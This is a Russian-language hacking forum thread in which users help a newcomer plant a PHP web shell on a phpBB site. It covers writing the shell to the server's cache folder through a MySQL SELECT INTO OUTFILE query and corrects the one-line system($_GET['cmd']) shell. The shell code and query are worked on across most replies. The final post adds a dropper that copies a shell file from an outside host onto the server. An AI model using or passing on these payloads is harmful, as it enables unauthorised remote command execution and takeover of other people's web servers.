Заливка шелла через БД

Discussion in 'Песочница' started by Tosic, 1 Jul 2006.

  1. Tosic

    Tosic New Member

    Joined:
    11 Apr 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом
    вот пример как я вытаскивал шелл
    SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример
    как лучше оформить запрос или что нужно вписать в БД
    текст шелла: <?p system("$_GET[cmd]"); ?>
     
  2. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    1) Проверь - разрешена ли запись в папку cache;
    2) Шелл - не <?p... , а <?php...;
    3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).
     
  3. banall

    banall New Member

    Joined:
    25 Jun 2006
    Messages:
    55
    Likes Received:
    3
    Reputations:
    0
    Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.
     
  4. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    >>Нифига не получиться форум в сафе режиме
    никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.
     
  5. Dw@d

    Dw@d Member

    Joined:
    22 Jan 2006
    Messages:
    3
    Likes Received:
    7
    Reputations:
    4
    лол )))))) такой код никогда и не заработает
     
  6. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Как я понял, там стоит phpBB. Тоды тебе сюда:
    1
    2
     
  7. Tosic

    Tosic New Member

    Joined:
    11 Apr 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса.
    как я понял код должен быть таким:
    <?php system($_GET["cmd"]); ?>
    правильно?
     
  8. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Лол млин учись нормально код делать

    или так
    Code:
    <? system(GET['cmd']); ?>
    или так
    Code:
    <?php system(GET['cmd']); ?>
     
    _________________________
  9. look2009

    look2009 Member

    Joined:
    3 Jun 2009
    Messages:
    80
    Likes Received:
    63
    Reputations:
    5
    Ну раз уж тема в индексе по запросу заливка шелла через БД, то подниму и дополню
    <?php copy("http://site.com/1.txt","dir/shell.php"); ?>
    Сам всё зальёт, если этот файл залили, то вызовем его для заливки шелла, тем более путь по любому нужен.
     
Loading...